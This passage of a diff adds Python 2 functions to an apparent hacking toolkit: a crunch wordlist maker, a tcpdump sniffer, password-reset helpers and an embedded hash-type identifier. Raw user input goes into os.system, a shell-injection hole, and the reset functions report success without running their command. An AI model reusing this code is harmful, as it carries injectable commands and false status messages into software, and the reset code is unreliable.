+#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + 